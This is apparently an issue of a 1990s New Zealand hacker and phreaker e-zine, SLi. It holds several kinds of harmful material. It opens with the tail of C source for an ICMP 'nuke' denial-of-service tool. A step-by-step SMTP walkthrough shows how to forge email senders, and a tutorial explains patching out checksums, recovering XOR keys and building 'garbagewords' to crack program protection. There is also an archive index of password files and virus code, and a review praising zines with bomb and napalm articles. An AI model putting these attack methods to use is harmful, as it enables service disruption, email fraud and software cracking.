**argv; { int i, type; if ((argc <4) || (argc >5)) { fprintf(stderr,"usage: nuke host uhost port [unreach_type]\n"); exit(1); } if (argc == 4) type = DEFAULT_UNREACH; else type = resolve_unreach_type(argv[4]); if ((type <0) ||(type >MAX_ICMP_UNREACH)) { fputs("invalid unreachable type",stderr); exit(1); } if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1); exit(0); } ---------------->8------------------------------------------------------------- Well, this is the smallest stuff I have, and I'm not gonna BORE you with kbyte's and kbyte's of source. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Busted for nothing ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Okay, I am being forced to type this by gun-point.. okay, maybe not to that extreme, but it's pretty damn close! We accept no responsibility for the writing of this article... Can I say that? No, I guess not.. oh well, I tried... =) For months we were receiving hundreds of dollars worth of bills through Telecom for calls we didn't make. For example, a $300 phone call when I was on holiday - there wasn't anyone home, so how could someone have had a conversation if there wasn't anyone home to accept the phone call? [NOTE: There isn't a pill box located anywhere NEAR my house, so don't go screaming BEIGE BOXING!! - mind you, I had this weird dream that I had this cute little pill box with wires sticking out of it which was right outside of our house. Ohmigod, I think I must be going crazy... ANYway..] These were directed through NZ-Direct from the US. Strange that. No one had been over to the states recently and it hadn't stated that it was by using a calling card, so that option was out. So, that required a monthly scream at Telco about that, and eventually we stopped getting billed for such calls (which I doubt even existed anyway). Okay, now that's just the TIP of the iceburg. How would you like to be "con- victed" for a "crime" you didn't commit? Well, that's basically what happen- ed. And it was such a PETTY crime at that. Try VMB hacking! It all started when we discovered a little VMB and everyone else happened to find it too. What a coincidence.. *grin* Many of their boxes had the de- fault passwords still attatched to them *sigh*. It's pathetic the way some companies leave their systems so open and then blame someone else for "abusing their system" when all we did was look around. Someone had editted the voice prompts ['twasn't me, but you know who you are... *grin*] and _I_ ended up taking the blame... hmm.. Anyway, a few of us ended up being "interrogated" over this stupid prompt editting and leaving "abusive messages". Anyway, the outcome was, I ended up being the only person accepting respon- sibility for the entire incident. That included me having to write two let- ters. Two copies of one letter - one copy to the guy who owned the VMB and the other copy to the head of Telco security "for scrutiny" - and another letter to the head of Wellington Telco security explaining the entire incident. In the end, it was a waste of time not only for me - having to write two letters - that didn't count the FIRST letter explaining why I shouldn't have my phone line disconnected (they sent a letter to me saying that if I didn't respond within a month, or summink, they'd disconnect it anyway - bunch o' pricks, huh?). In my final letter to the head of Wellington Telco Security, I reminded them of the hundreds of dollars worth of calls I had to complain about each month. FINALLY, something was actually done about it, and the hundred dollars worth of calls were credited to my account. The stupid thing was that I didn't do a thing, and had to put up with all the crap that they threw at me. I also had my 3-way call cancelled. In conclusion (they always said you have to include one in essays so I'd bet- ter get extra practice =) ), I'd just like to say that they're a bunch of dorks. Oh, and the new telephone account layout really sucks too. [CyntaxEra Mature Mode: ON] *grin* In my opinon, it was better the way it was, but that doesn't matter, does it? It's probably cheaper for them to do it the new way. That would explain it all... =) SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Books 2 Read ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Title Author Stars ================================================================= The Fools Run ...................... John Camp ***** Complicity ...................... Iain Banks **** War Day ...................... Strieber & Kunetka ***** Blood Music ...................... Greg Bear ****? SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ The SLi Archive Subject list ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Okay, this is the list of all the file areas in the SLi archives. It's a direct copy of the "/pub/README.NOW!" file and is up to date as of the release date. -sof- Welcome to the SLi archives! We hope your stay is, err, umm, "enlightening". The operator of this system takes no responsibility for how the information is used, BUT suggests STRONGLY you do NOT try ANYTHING, ANY of the files describe! Some acts depicted in the files held within this archive describe illegal or immoral acts. PLEASE use your commonsense when defining right from wrong. This archive exists to be a library of information, to show people a dif- ferent outlook on the world and, in truth, a different outlook on life to give them the opportunity to delve into the realms of adventure and know- ledge - NOT to insight or teach people how to break the law. Directories Sub Directories Description -----------+-------------------+------------------------------------------- ./ai Artificial Intellegence. ./anarchy Anarchy files, explosives etc. (Likly not to be here anymore as I'm against this kinda shit now) ./art Art. ansi If I find ppl up'ing ANSI, I'll shoot them. ascii Better than ANSI, I guess. vt-xxx VT Animations at present. ./bbs bbs-adds BBS adverts - numbers etc.. . au . nz . other . uk usa . misc ./busts Info on different busts. ./cc Info on creadit/calling cards, ATMs etc. ./civil Civil liberties ./cons Conferences for H/P people - where when, what happened and confs to come. ./corewars Files for Core Wars. ./cryptography Encrypting and Decrypting. ./cyber The world of the Cyberpunk. ./eff Information on the Electronic Freedom Foundation - a US civial rights group. ./faq General Frequently Asked Questions. ./history A MUST to read you HAVE to read these files they are linked to other direct- ories all over the SLi archive but they contain a history of different events in the H/P world. ./howto How-to Guides to misc computer related activities. ./incoming Incoming files. ./info These files are also contained in other places. In this archive but are here be- cause they should be read and because in my opinion, they are important. ./internet Internet related files. irc Internet Relay Chat [IRC] files. sites Different FTP/TELNET sites. ./misc Just a lot of misc stuff with no real home. bible Obviously, the Bible. ./mischp Misc Hack/Phreak files. cable Files to do with Cable TV/SKY. lockpick Lock-picking related files. ./music Music related stuff. lyrics Lyrics for songs etc. misc Misc music related files. mods Electronic music - most powerpacked for Amiga. vocs PC Sound files. ./nz New Zealand related files! ./passwds Password files for different systems. Please rename the password file to be "systemname-dd-mm-yy". ie. lamesystem-01-02-95. ./pharm Drug files (also probably going to be removed for the same reason as "anarchy") ./phreak Information on the Telephone System. box Different phreaking "boxes". cellfone Cellular Fones. countrycodes Every Area/Country Code in the world. fone-fraud Misc files on fone-fraud written by Telco/Schools. history History of the Telefone . misc Misc Files. miscexe Misc Executables. payfones Payphone related files. . pbx Private Branch eXchanges [PBXs]. standards Different CCITT/Phone Standards. . vmb Voice Mail Boxes [VMBs]. ./pirate Breaking the (c) protection of S/W. amiga crack coding . ibm mac ./police Understand thy opposition misc Miscellaneous files on the police. ./publications Different files from well-known authors or organisations. bruce_sterling Includes The Hacker Crackdown and inside directories FSF_columns, catscan and interzone. david_faber denning john_gilmore Includes inside directories Gilmore_v_NSA and inside that, Clipper_FOIA and ITAR_FOIA. john_perry_barlow kapor unsorted Miscellaneous unsorted publications. ./security Computer Security, Bug fixes and security. hole descriptions. 8lgm Unix bugs cert Computer Emergency Response Co-ordination Centre. cert_advisories A LOT of system security holes clippings Misc clippings from diffrent usenet sources. misc Misc info. . dos. DOS security files. novell Novell netware. tools Misc tools for DOS. faq Frequently Asked Questions. mac Misc files for the Macintosh. misc Misc files on Computer Security. os2 Files for OS2. unix Files for UNIX based OS's. antihacktools Anti-Hacker Tools hackerssrc Various source for you hackers. hp Files for hacking the Hewlett-Packard's HPX000's. vax Vax/Digital/VMS Security. x.25. x.25 security holes ./sli Southern Lights inc. File Areas. articles interest Files that are related to SLi and are an intrest to the rest of the H/P world mags The SLi Mags are stored here. . warnings READ any files in here! ./strange Weird files that should have no place to go :) . occult Stuff on the occult . ufo UFO files. ./system Files for different OS's. . amiga asm . utils . dos linux ./txts Like misc really. ./usenet Files/Msgs from usenet. ./virus Virus Creators and virus code. Any anti- virus people feel free to use this info to create virus killers. ./words Word files. ./zines Electronic Mags. . hpa Hacking, Phreaking and Anarchy Mags. . other Don't fit anywhere. . weird Very weird. TOTAL DISK SPACE USED: 79055Kbytes [compressed] Approximately 200Meg [uncompressed]. As of recent times, we have been updating the system at 1-2 Meg per day. However, this cannot continue, as we have but 40Meg available disk space remaining, but if anyone is willing to donate an IDE drive, we will be most appreciative. NOTE: The use of the word "removed" is being used as in "access to these files will be removed from normal access users". SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Fake Mail ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Well, I dont know WHY this is in here, but just in case your interested and DIDN'T know how to send fake Internet E-Mail here is a step by step way to do it. KEY: ignore []'s *'s are lines that you type type "telnet [target.comp] 25" at $prompt. Trying [target.comp]... Connected [target.comp]. Escape character is '^]'. 220-[target comp] [Mailer/Version] ready at [date/time] 220 ESMTP spoken here *helo [where.from.comp] 250 [Target.comp] Hello [where.from.comp] [###.###.###], pleased to meet you *mail from: [where@ever.you.like] 250 [where@ever.you.like]... Sender ok *rcpt to: [target@target.comp] 250 [target@Target.comp]... Recipient ok *data 354 Enter mail, end with "." on a line by itself *hello *. 250 DAA28466 Message accepted for delivery *quit 221 [Target.Comp] closing connection Connection closed by foreign host. $ Well there you have it. Nice and easy. If you didnt know it already, I'm a bit disappointed, but that's what we are here for. To teach YOU. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Elements of Data Deprotection ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Elements of Data Deprotection - by Thorium Data Deprotection is one of my many hobbies. Others include bomb making, programming, hacking, shooting, phreaking and appearing in court. I am by no means an expert in this field, in fact I would regard myself as a "seasoned ammeter". However, I feel that some tips I have picked up over the years could help others. For this reason I am writing this file. HOLD IT! You can't program? Well, this won't be much good to ya. You might even need to know some assembler on whatever platform you use. I use Amiga's usually (because they are simply the best personal computer - well for assembler programmers anyway) so I know a fair bit of 68000 assembler. It also helps to know a few common opcodes (what the actual text of assembler language gets turned into, ie machine language) and how to use a good debugger and disassembler. So, if you are up to here, you're half way to being a K-RAD ELITE DUDE anyway. In fact, you can probably do more interesting things that most who call themselves "K-RAD ELITE DUDE"s - so why are you reading this? That's right, you thought you might pick up a hint or two in an underground publication. Ok, I hope you learn something. First: What do I mean "Data Deprotection" ??? This is probably not the best name for what I will actually describe, but it is all I could think of. I mean "getting into data" - but not in the sense of cryptanalasys and that sort of thing that requires a degree. Data Deprotection has particular reference to more breaking encryption algorithms, to getting around or breaking checksums and CRC's, and making small but crucial changes to programs. NOTE: Some people would call some uses of these skills "Cracking", and assume that you go around breaking the protection on games. This is distinctly possible, but before I go further, I would like to point out my personal feelings on breaking program protection: If you "crack" a game and distribute it, you are killing the software industry. Anyway, you needed an original to crack - which someone had to buy - so whoever bought it is stupid if they pay for something then let everyone else have it. Basically, I do crack games and things, but I don't spread what I do. The main reason for this is that I'm not good enough to keep up with the "big boys" in Europe who crack the latest game overnight. If I get hold of an original game, it is usually fairly old anyway, like a year or two, and even back then they had some pretty tricky protection that has taken a while to get around (like a few days work). Of course, there are those dead simple games (try Eye of the Beholder II for a beginners one). Thing is, everyone has it by the time I have finished with it. So I don't crack to spread. I hardly crack games at all, since my access to originals is limited. I crack only for the fun of it. And it is quite fun to pitch your mind against those of the programmers - kind of like chess play-by-purchase. Anyway, that's my ideas on cracking games etc. If you want to, go ahead. It just kills the industry. This is why this article will deal as little as possible with things that could be used to crack games. It will deal more with accessing data from programs that you aren't really 'sposed to access. So, you have this program. You have made whatever change to it for whatever reason, an it now comes up "corrupt data" or something along those lines. Now, all you did was change a "Compare with password" to a "Don't do anything" - so you know it should be able to work fine. To see if a checksum is your problem, try running the program in it's original form from your debugger. Just straight running it. If it still comes up "error" then your debugger just 'aint good enough, since it is not totally transparent to the program. It would require a discussion on each debugger to fix this, and I only know those that I use. If it ran OK, try placing a breakpoint at the place where you change things and then running the program. Don't do anything at the breakpoint, just run the program. If it fails, chances are you have a checksum. If not, try putting the breakpoints around your place you changed, and after they break, put them back. If it fails, it's probably some sort of check. If not, something wierd is happening. The reason behind this is that almost all debuggers will use breakpoints that actually change the memory that you place a breakpoint on. So when a program goes to check it's memory, if there is a breakpoint there, it won't find what it thought it would. So, your program has a checksum? If not, you will need to do a little more hacking to find out what's up. It usually 'aint too hard, but beyond the scope of this text. Well, the next thing to do is FIND the checksum. This can be done by placing a breakpoint on your place to change. If you run it and without putting the breakpoint back after it occurs then your program runs fine, then your check is AFTER the part you altered. If it fails, then the checksum is BEFORE the part you altered. Pretty simple really. You can further narrow this down by putting breakpoints at strategic points throughout the code, and watching what happens when you have a breakpoint in existence only up to there. You will eventually find the area of code that does the check. Once you have found this piece of code, you can figure out what it does. Chances are your program is in some form of compiled language, so won't be as easy to read as 100% assembler code, but by tracing through it, you can usually figure out what's up. The skill is to look for critical points in the code. THERE WILL (almost) ALWAYS BE A COMPARE after any sort of checksum, wether it be a simple addition, or a complicated CRC. This compare will then have a conditional statement - this is the crux of it. All you do is remove the conditional and cover it with a constant - if it is supposed to branch if a certain value, make it branch always. If it branches only if NOT a certain value, make it a do-nothing set of instructions. Sometimes there will be more than one check of the value, so you must find all of them. I feel I may have just skipped a vital idea. We changed the conditional rather than the compare value because we want all future attempts at this routine to be correct. This may be easier illustrated in, for example, a trainer mode for a game. It is better to make UNLIMITED lives by removing the conditional, than to have 9999999 lives - because you can still die. Also it is a lot easier to change back to it's original form if you stuff up, because you only need write down the opcodes, not the constant. Now you have just gotten around a check in the program. There may be more, and they may be hidden. So just test your program for full functionality. Insert your original alteration, and test again. If you still have problems, try this again. There could be multiple checks, checks on checks, and all sorts of stuff. You will notice now that the "difference" between your original program and the altered one will only be a few key bytes. However it is how these key bytes are placed that is important. This is only one skill of many you will pick up as a hacker / cracker, but one of the most used. And now to make this entire section useless, I shall tell you how to get around this type of hacking / cracking when you are on the programming end. MAKE YOUR CHECK VARIABLES DO SOMETHING. If you calculate the CRC or some vital code, don't just compare it, use it as a relative pointer into a data segment. If the CRC is wrong, your system crashes. It's best to not even COMPARE it, as this means you have the correct value sitting there. Just assume it is right, and have the checksum or CRC or whatever in your initialization code, but don't use it till much later on. This way your hacker will likely give up. And to make that useless - how to crack programs that use this technique (gee, get the feeling every crack leads to a fix, and every fix leads to a crack?). Just debug the program, figure out the correct value for the CRC or whatever, and hard-code that in! Wipe over the CRC routine with one that sets any variables it was supposed to correctly. Chances are it will take up less space anyway! So, we have done "actually changing a program" from the point of view of making it run with changes. Now I shall cover (very basically) encryption and decryption. Encryption is mostly used to keep things from prying eyes. Which is exactly what makes me want to break it. A program might have it's datafiles stored encrypted to stop you getting unfair hints, or it might have some of it's code encrypted that does some magical copy protection. Essential to the breaking of codes with reference to programs, is that any program has all the code necessary to decrypt it's data. PGP has all it's code there in source form, what could be easier. However, this is where the first problem starts - the KEY. If you know the key, you really dont need to be reading this. If you don't know the key, you have to break the algorithm. This is where it gets hard. PGP is more or less unbreakable, because it uses a complicated algorithm and a complex and constantly changing key (different for each person). However most programs use only 1 key, and that is usually stored within the program itself. The simplest of routines is that you get all your data, and logically NOT it, ie all 1's become 0's and all 0's become 1's. For this simple system, the algorithm IS the key. All you do is reverse the algorithm, ie run it over again, and out comes your data. Another logical operator, Exclusive-OR (sometimes refered to as EOR or XOR), is commonly used. This is easiest thought of as a "selective not" - where each bit in the "key" (source) says wether each bit in the destination should be "NOT"'d. If the key bit is a 1, it is. So a key of 1010 and a dest of 1001 would become 0011. This also is also a reversible algorithm, so all you do is run it over again. EOR has the advantage as a algorithm with a "key" component. The KEY can be difficult to guess, especially if it is more than 1 byte. However there are ways to get around it. First, see if the program uses a fixed key - ie debug / disassemble it and see. If so, there you have it. A little playing around and you have your data. This brings me to the next main point of this article - finding the EOR key if you don't have one. This is actually really easy - all you need to do is know some of the data that is after the EOR, and the length of the Key. The length of the key can usually be determined from the algorithm, if it is a continuous loop of EOR'ing a byte with some data, the key is a byte. If it is going through a reference table (and you can't just dig this table up) then you have to figure out how long it is. You also need to know at least one keylength of decrypted data. What you do is rely on the fact that 1010 EOR 1001 = 0011 and also 0011 EOR 1001 = 1010 - in other words, the key acting on the cypher yields the data, and the data acting on the cypher yields the key! So all you do is write a small program that gets your data, and eor's it with the cypher, and you have the key. You can also build a key from some fragments of data by guessing what the data in between might be - if this is text, it is usually easy. Now you apply your key to the rest of the data. Simple! However one problem is that you usually don't know where abouts in the cypher your data comes from - so the solution is to write a program that uses the data in every possible position in the cypher to yield every possible key, and then use that key on every piece of cypher, and see what comes out. This may take a while, and you need to be able to recognize the data in it's correct form, easy if it's text, otherwise difficult. Other common forms of encryption are addition / subtraction of constant or changing values, rotation of bits (either in byte, word, or larger blocks), and swapping blocks of data (be they bits, bytes or larger blocks). The important thing to remember is that the program itself has to be able to decrypt the data, so with enough care and patience you can find that bit and copy it. Remember also that there can be more than one level of encryption, and different sets of algorithms for different blocks of data. The final thing I wish to deal with is the topic of "One Way Encryption" - it is used sometimes to create keys for the above checks and decryption. It is also useful if you can break the algorithm to make an automatic password generator for encrypted files from a given program... This situation is actually very common. It is a real pain. However, you spot an algorithm that creates the key, possible from a password! Now, somehow a password of any length is "shrunk" or "expanded" to fit a given key length, and this is used to decrypt the data. This is called "One Way" encryption, and is commonly used on passwords. The key created has little bearing to the original password, and can't be recovered because there is usually a "loss of significance" of data. The simplest way to explain is to use the simplest one-way algorithm. Just add all the bytes of a string together, in a byte. This way you are bound to get overflow, rendering some data lost. However you end up with a byte to use, and it will be a byte regardless of the length of the password. So, if you can't get the password back, how do you pass the test? Simple - you create a "garbageword". This is something that is functionally the same as the password, but not actually the password. It is gained by reversing the algorithm given the result. In this simple algorithm all you do is get your byte key, and subtract as many "A"'s as possible from it. Say your key was hex $BC (which incedentially is the byte sum of the letters 'keys'. You can subtract 'A' (hex $41) from it 2 times, leaving hex $3A, which is ':' which may not be liked by our algorithm if it only takes text, so we find how much we have to TAKE OFF it to get a letter or number. The closest number is '9' just below it, so we use that, and add the extra 1 to one of the 'A's. Therefore our garbageword is now 'AB9' - this is functionally the same as 'keys' for this algorithm, and so we have broken the lock. You will hardly ever get an algorithm as simple as this one, but _ANY_ one way encryption can be made to yeild a garbageword given the key if you devote enough time to it. And how do you stop this sort of breaking of your algorithms? Easy - make it so complex that a hacker will never want to break it. - remember your algorithm will always yeild the same key with the same input, so you don't have to understand what you have written, you just need to check that it makes different keys. For example, try to break one that rotates a 2-byte key sotrage by the lowest 4 bits of a letter to the right, then adds the letter, then rotates left by the upper 4 bits, and EOR's the letter. This is not actually _THAT_ hard to create a reverse algorithm for, it is just very hard to create a printable garbageword. And as long as you make your entry of the password only take printable letters, it will be hard to beat. And you have a 1 in 65535 chance of fluking it. But by using a slightly more complicated algorithm and 4 bytes of data, you would have a 1 in 4294967294 chance. And an even "trickier" one to break is the algorithm in PowerPacker encrypted executable files. Nico has thought it out well. You type in a password, and it calcuates a word to compare and tell you if the password is valid, but uses a totally separate algorithm to generate a longword for the actual decryption key - so any garbageword you make from the compare word is only going to have a 1 in 65535 change of being correct... Makes things a little difficult , eh? And to make it harder the only encrypted stuff is the actual crunched data - which seems to be crunched differently than with no password as well, so I can't think of any way, short of formal cryptanalasys, to get around it. Well, that's about it from me, bit this is only the tip of the iceberg of what there is to learn before you are even a half-competent hacker in these here parts... But they are 3 important things that will lead to much more. * Data wants to be free - so help it out * SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Review: 'ToT' ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. REVIEW: 'Tricks of the Trade' [ToT] This is the first review that we will be including in the SLi Magazine, but we hope to expand to reviewing a few others in the future. [PLEASE NOTE: This is a critical review. Some have said it has been a little too critical, perhaps that is the case, but the decision is to be left to you, the reader.] [BRIEFING] WHAT? Electronic Magazine. WHO? Distributed by: Raider. Content by : Hype, Red Lion, Mutant-X, GreyRat, Nick, Demogordon, X-Treme and Kevin. WHEN? 24th December 1994 WHERE? Written by a group of Wellington H/P/A's. Perhaps a couple of members out of the Wellington region seeming that at present I am unable to pin-point the locations and identities of a couple of the 'ToT' writers. WHY? This question stumped me for a while as I can only give my opinion. I came up with the following - a) for the pure reason to educate others coming up in the H/P/A scene, b) to give 'SLi' a taste of competition (this could be fun!) or maybe even, c) to get a bit of the limelight. These are in order of my suspicions from 'A' being the most likely, to 'C' being the least likely. HOW? Thought it was pretty damn obvious, but for those of you who are interested... They got each of the writers to write their articles down on paper then gave them to the editor to type out on his dinky li'l 'puter... [Editors Note: This seems to be the most TIME wasting story I've EVER heard BUT that's what they did, so 'Raider' said. ] [CRITICAL REVIEW] This magazine isn't too bad for the first couple of issues, but admittably, the first issue had a little more to be desired. The idea of there being a variety is 'okay', but that depends on the indi- viduals of which the magazine was/is designed for. In my opinion, it appears that 'ToT' is designed with the lesser educated in the H/P/A scene in mind. There were quite a number of articles in the second issue of 'ToT' in comparison to any of the 'SLi' issues, but the articles in 'ToT' were fairly brief and the ideas were a little out-dated. It appears that 'ToT' is still in the process of deciding where it wants to go - it would've been a better idea if plans had been made earlier and those decisions would've made the foundation to start off with. With 'SLi', all the needy decisions had been made PRIOR to even STARTING the magazine. 'SLi' was a group of companions FAR before it was a magazine - It's ad- viable to know who's going to be there when you need them and whether they can be trusted or not. The only way you can find out is by experimentation. And that's what we did. Anyway, going back to 'ToT' and it's purpose in the H/P/A scene... After a good read throughout the magazine, I noticed that there is a fair deal of information dealing with the Australian telephone network. It may do a good job there, but WHO are the main people who are most probably going to make use of the information stored within the bits and bytes? I may be wrong, but I would say it would be us 'kiwi H/P/A's' who would benefit most from the information. It looks as though 'ToT' is in too much of a hurry to be known widespread - 'slow and steady wins the race' would be a good phrase to put there. Following is an 'article-by-article review' of 'ToT#2': [REVIEW] [Articles One-Three: Clickers] Clickers. I haven't known of one which has worked yet, but that might just be that those of whom have used them had not used them correctly. Strange that they hadn't managed to work for about four people, but I guess you'll just have to try them out for yourself considering that I haven't tried them out myself. At least you'll get your own BBQ lighter... Pretty sure that they'd make a pretty good shock device - could be used as a stun gun if they're what I think they are. [Article Four: Travel Sickness] The only flaw I could be sure on commenting on, is the lack of information on what they [the tablets] actually do to the human body and whether or not they're safe (or at least not lethal). If ideas like this one are printed without thought to any consequences they may have, we may find that a lot of people may suffer injuries due to the lack of information given to the reader. Mind you, if you're silly enough to try something without attempting to find out about it beforehand, then you hold as much responsibility as the person responsible for the printing of the information given. [Article Five: Busted???] Well, I guess I have no problems at all with this article. This is an art- icle providing information to the reader which does not prompt for any further action. [Article Six: Credit Card Calling] I had just recently covered this in the 'SLi#3' before I had any knowledge of this article at all - it covered basically the same aspects but I'd tried to explain it a little more to make sure it was understood better, but this article is nonetheless okay, even if I disagree with some of the hints to a certain degree. Still, a good article. [Article Seven: Nut n Bolt Bomb] It's already well-known that match heads contain explosive chemicals, but I think that the writer of this article COULD have at least pointed out how dangerous this can be - what with the flying shrapnel and the explosiveness of the match head mixture. I was dismayed at the fact that I couldn't spot a single safety warning right throughout the entire magazine at all. [Note: This has already been covered in a few other mags prior to this one, ie. early editions of Phrack among others.] [Article Eight: Hacking Calling Cardz] The article was a little vague, but (because of previous experiences with this scenario) I could see what they were trying to explain. I find that if you're more polite, you get what you want quicker instead of having to bumble around with other unnecessary situations - no one likes a pushy operator, so you can imagine how the victims would feel! [Article Nine: One for the Neighbourz] Well... I don't really have a comment on this one - read it for yourself.. I'm kind of, uh, "speachless". =) [Article Ten: Hot Air Balloon] A nicely presented article. I don't think I'd bother trying to build one though considering I'd find it a fire-hazard if put together wrong and the chances are, I'd do it wrong. Still, worth a try if you're into this sort of thing and are competent in doing so. =) [Article Eleven: Hidenburg Balloon] This is just your basic acid-base explosion when you bring a naked flame to Hydrogen[?]. A nice little bang, but watch for flying pieces of glass if there are any - should be careful. [Article Twelve: Hintz n Tipz for Pot Planting] A nice little article on (as it says in the title) hints and tips for the planting of marijuana plants. Not bad.. not bad at all. Even if originally posted on "Bad Sector BBS" and then (with the writer's permission, of course) transferred to the magazine - at least it's making use of your resources. =) [Article Thirteen: How to Pass a Lie Detector Test] A very entertaining article.. What can I say? I enjoyed reading it. ... But WHERE are you going to have to fake a lie detector test. If you're foolish enuff to get caught, you can guarantee they have enough on you and they WONT need you to confirm or deny it. Well, I guess if you're being in- terrogated about certain activities concerning friends, this could be handy. Still, a good read - you never know when you might need it. [Article Fourteen: Just 4 Fun] Uh, short. Very short in fact. A space filler? [Article Fifteen: Corn Bombs] A simple, no nonsense bomb. [Article Sixteen: Fucking up a BBS] Old concept. Has been brought up in MANY different places, magazines, person-to-person chats, etc... Simple commonsense really. Telecom seems to be tightening up the security of other peoples services - about time they'd wised up to the old trick! [Article Seventeen: Hacking CityNet/Genie] The first part showed potential for something not to laugh at, although, it was an old trick and many people had already been aware of the fact that it was something done quite often. But, why bother when you can just walk in and make your own account? Even one with a fake name. All you need to do is simply USE YOUR COMMONSENSE. As for the hacking of CityNet/Genie passwords with the user's names, you can't guarantee that it's going to work. Is it really worth the trouble? Are you going to bother finding out EVERY SINGLE USER NAME on the system and sit there trying them all day/night? I guess you could spend a couple of minutes/hours/days writing a proggy/shell script to do it for you, but I wouldn't want to tie my phoneline up! The service is free, so isn't that enough? [Article Eighteen: Strange Auzzie Numberz] So, how many people out there, who've read this article, are going to fly, float, swim, etc... to Australia? This is of no use to you if you're not planning on visiting them within this half-decade or so. The chances of any flaws, from today still being around by that time are pretty slim due to the technology boom that should occur in the next few years. Although, this is useful if you have friends/associates living in Aussie who you like to keep in contact with. [Article Nineteen: Hackerz Hit Telecom] Yet another article dealing with the land mass north-west of New Zealand. The article was okay for light reading, but was of little interest to my- self. Similar to 'Article Five: Busted???' in that it is a "media reported" incident. [Article Twenty: 008 Diverter] Refer to [Article Eighteen: Strange Auzzie Numberz]. [Article Twenty-One: Eureka] One word: Childish... Oh, and a couple more: ... next please... [Article Twenty-Two: Making Napalm] I highly disliked the example of a cat being used and I have already voiced my opinion on this to 'Raider'. I'm not too sure whether they [the writers] realize the effects of their ideas seeming that there are going to be those people/kids around who will try ANYthing for the sheer sake of it. Other than the use of the cat in the article, there isn't too much more I'd comment on. Interesting mixture - could be useful...... somewhere.. =) [Article Twenty-Three: 10 Metre Cigarette Lighter] The 'cigarette lighter' trick seems okay, the sugar/flour idea is an ancient idea created 'decades' ago. As for the petrol soaked rags, I don't think there are many people who are planning on trying to KILL the 'victim' - at least I'd like to think not. [Article Twenty-Four: Exploding Rockz] Could be sore. How do you feel about 'hail'? =) [Article Twenty-Five: How to Cure a Hangover] Interesting tips. I'll keep them in mind if I need them! Oh, another tip for how to cure a hangover - so I was informed - just eat a lemon. I know it would surely bring ME down to earth pretty quickly! [Article Twenty-Six: Coca-Cola Recipe] Is it really worth the trouble when, in some places, you can get 500ml worth for a single dollar? What if you stuff up? You end up with a large amount of worthless goo - mind you, you could try selling it to the city council to use as TAR. *grin* [Editors Note: Also, Coca, or the leaf of the coca plant, [Cocaine] would be a LOT harder to find at the local supermarket.] [Article Twenty-Seven: Voodoo Magic] Each to one's own. If you believe it, go for it, I guess. [Article Twenty-Eight: Excusez for Missing Class] Lacked information on the consequences of truancy, and take it from someone who's knowledgeable of these acts. It's just not worth it. As for the cheat- ing in exams - What if you're caught? You may as well forget about getting a job you'll enjoy - you'll be stuck with cleaning floors and packing burgers, fries and Coke. Sounds fun, don't it? [Editor's Note: Or making Coke!] [Article Twenty-Nine: Greetz and Msgz to Contactz] The title says it all... Couldn't find anything wrong with it. =) [Article Thirty: ToT - The Future?] Interesting reading. 'Know thine enemy'. Hehe, nah, I don't think it would come to that, but just to be on the safe side... *manical grin* *wink* [Article Thirty-One: Last Wordz] Normally skipped by the reader, but worth a read anyway. [FINAL ANALISYS] Some of the ideas expressed in 'ToT#2' had already been 'spread about' prior to the release of 'ToT Magazine #2', so repeating the ideas wouldn't have made much impact - especially if a lot of people know about them already. If anything, it's a waste of disk space (j/k!). Some of the art- icles, I found rather childish and others a little dangerous - not to mention a lack of warnings which was one of my main concerns (it was something we'd also forgot about in our previous mags, but you wise up after chats with Telecom/other authorities!). As far as I'm concerned, I'd rate this magazine as a 7/10 (I haven't yet come across a 10 yet, so consider me to be a hard marker.. ;) ). The magazine on the whole was 'nice light reading' seeming that the articles are, on average, between a third of a page and a page, in length. Not a bad try for a local Wellington H/P/A group really seeming that they had at least SOMEthing to say. If you've got a small attention span, and are new to the H/P/A scene, then this is the magazine for you. I found it to be of no practical use to me, but it may do for you - it depends on WHAT you're actually looking for. You don't have to take my word for it - Why not just grab a copy and read it for y'self? Finally, I'd just like to say - Quality, not Quantity is the key to success with a good magazine. Maybe if the editor was interested less in the latter, and more in the prior, it may show promise. Many electronic magazines don't start out the best - due to lack of organ- isation - but they normally get sorted out by about their third issue if you're really serious about it. [NOTES] We, at SLi, welcome ANY comments at all and thoughts of setting up a 'Letters to the Editors' section in the magazine are in the process of being thought over. Letters will, or will not, be printed depending on whether it's wanted or not - in respective order. We can be reached at: NOTE: All Internet addresses at the moment are on hold _DO_NOT_ e-mail us at _ANY_ of our previous e-mail addresses. This email address works at the time of publication: hacker_m@ix.wcc.govt.nz Snail Mail: SLi PO Box 3030 Onekawa Napier SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ SLi ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. In this part of the mag, WE [the guys and gals of SLi] tell ya what the group is doing. WHAT IS SLi? and WHAT WE STAND FOR: Freedom and the right to publish our views and the RIGHT to TEACH _YOU_ what we know. Read the article "Honour" if you want to see what rules we TRY to live by. Members resigned by choice from SLi: Digital Omega 